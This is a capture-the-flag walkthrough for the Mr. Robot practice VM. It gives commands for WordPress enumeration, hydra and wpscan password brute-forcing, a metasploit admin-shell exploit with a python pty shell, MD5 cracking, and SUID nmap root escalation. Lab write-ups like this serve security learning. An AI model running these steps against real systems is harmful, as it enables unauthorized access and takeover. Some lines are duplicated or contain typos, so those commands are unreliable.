Mr. Robot CTF Walkthrough
Information Gathering
netdiscover -i wlan0 – To get the server address
Nmap -O 192.168.1.108 – To scan the target and get info regarding the OS and services
Vulnerability Assessment
Use web vulnerability scanners like Wpscan or Nikto to discover vulnerabilities
Wpscan –url 192.168.1.108
nikto -h 192.168.1.108
Wpscan –url 192.168.1.108
nikto -h 192.168.1.108
Capturing the first flag
Access the robots.txt file
Use the wget utility or burp suite to get the files and open the first key
Wget <IP> /fsocity.dic/key-1-of-3.txt
Use the wget utility or burp suite to get the files and open the first key
Wget <IP> /fsocity.dic/key-1-of-3.txt
Optimizing the dictionary file
The dictionary file has many duplicates and needs to be optimized and sorted for maximum efficiency.
This will come in handy when we are performing a brute force/dictionary attack; as the attempts will be carried out in an ordered and as efficient as possible. Minimizing the cracking time and reducing the size of the dictionary file.
This will come in handy when we are performing a brute force/dictionary attack; as the attempts will be carried out in an ordered and as efficient as possible. Minimizing the cracking time and reducing the size of the dictionary file.
cat fsocity.dic| sort -u | uniq > Newfsocity.dic
use wpscan and find the log in page, we need the username and password, but luckily we have the dictionary file
We need to intercept the requests being send and modify them to get the username
we can do this using burp or zap, I am going to use burp
we can do this using burp or zap, I am going to use burp
We can stop the intercept, use the proxy and then turn on intercept and enter credentials and hit log in.
We can then intercept the post request and identify the fields we need to brute force.
We can then intercept the post request and identify the fields we need to brute force.
We now need to use an online cracking tool, we can use hydra as it is the most powerful
We are going to use the log and pwd fields
The objective is to find the username first, we can then bruteforce the password after
hydra -V -L fsocity.dic-p test 192.168.1.108 http-post-form ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username’
This should work for most forms
We are looking for the hhtp post form, that shows us that a username exists
We can now use wpscan to crack the password, because it is faster for wordpress cracking
wpscan –url 192.168.1.108 –wordlist home/alexis/Desktop/fsocity.dic –username elliot
Exploitation
We can now log in and I am the admin so I can install plug ins like a file manager, I now need to maintain access and escalate my privileges , I can do this by using weevely for a backdoor and a reverse shell, or we can be smart and use metasploit which will do all the hard work for us and we can use meterpreter for a reverse connection
msfconsole
search wp_admin_shell
use and set options – username password rhost exploit
It is going to give us a meterpreter with a shell but with no tty (terminal)
We can then start a tty shell – terminal shell
– shell
Many people over complicate it by importing it with python
/bin/sh -i
or
python -c ‘import pty; pty.spawn(“/bin/sh”)’
or
python -c ‘import pty; pty.spawn(“/bin/sh”)’
We can check who we are logged in as
id
cd /home/robot
key-2-of-3.txt
key-2 and password.raw-md5
key-2 and password.raw-md5
cat password.raw-md5
it is an md5 hashed password that we can crack with hashcat or because I am lazy crackstation.net
login as robot and we now have the password so we can log in
we can then view the 2nd key – cat home/robot/key2
Privilege Escalation
Ok we now need to get root access also known as privilege escalation
The only way in is by finding a file that has the super user ID bits (SUID)
The only way in is by finding a file that has the super user ID bits (SUID)
We can use the find command
find / -perm -4000 2>/dev/null
it looks like we can use Nmap in root
Let’s see if we can run it in interactive mode which will allow us to use additional commands to get the root
Nmap –interactive
sh! – to get in to root
id – and we are root!
Let’s go to the root folder and we get the last key
Done
Comments
Post a Comment